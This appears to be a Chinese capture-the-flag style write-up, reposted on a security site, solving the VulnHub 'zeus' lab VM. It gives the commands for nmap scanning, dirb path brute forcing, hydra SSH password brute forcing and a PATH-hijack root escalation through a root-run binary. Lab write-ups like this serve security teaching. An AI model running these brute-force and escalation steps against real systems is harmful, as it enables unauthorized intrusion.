vulnhub之zeus的实践

admin 2024年10月14日10:27:23评论16 views字数 771阅读2分34秒阅读模式

本周实践的是vulnhub的zeus镜像,

下载地址,https://download.vulnhub.com/zeus/zeus-ovf.zip,

workstation导入成功,

由于靶机用的是静态地址192.168.131.170,

workstation里修改nat模式的dhcp地址池为192.168.131.0/24,

这样就能让kali攻击机分配到跟靶机同网段的地址,

对靶机做端口扫描sudo nmap -sS -sV -T5 -A -p- 192.168.131.170,

获取到靶机开放了22端口的ssh服务和80端口的http服务,

vulnhub之zeus的实践

对http服务做路径暴破,

dirb http://192.168.131.170 /usr/share/wordlists/dirb/big.txt,

获取到http://192.168.131.170/telecom,

vulnhub之zeus的实践

浏览器访问http://192.168.131.170/telecom,

发现是空白页面,查看页面源码获取到用户名gogu,

vulnhub之zeus的实践

对gogu用户做ssh登录密码的暴破,

hydra -l gogu -P /usr/share/wordlists/rockyou.txt 192.168.131.170 ssh,获取到密码universal,

vulnhub之zeus的实践

ssh登录到靶机,ssh [email protected]

递归查询隐藏文件,ls -lRah,获取到root权限执行的sysdate,

vulnhub之zeus的实践

创建假的date程序,echo "/bin/sh" > date,

修改权限chmod 777 date,

发布环境变量,export PATH=/home/gogu:$PATH,

执行/home/gogu/.../sysdate,

id 1<&2查看当前shell权限为root,

vulnhub之zeus的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之zeus的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月14日10:27:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之zeus的实践https://cn-sec.com/archives/3264772.html

发表评论

匿名网友 填写信息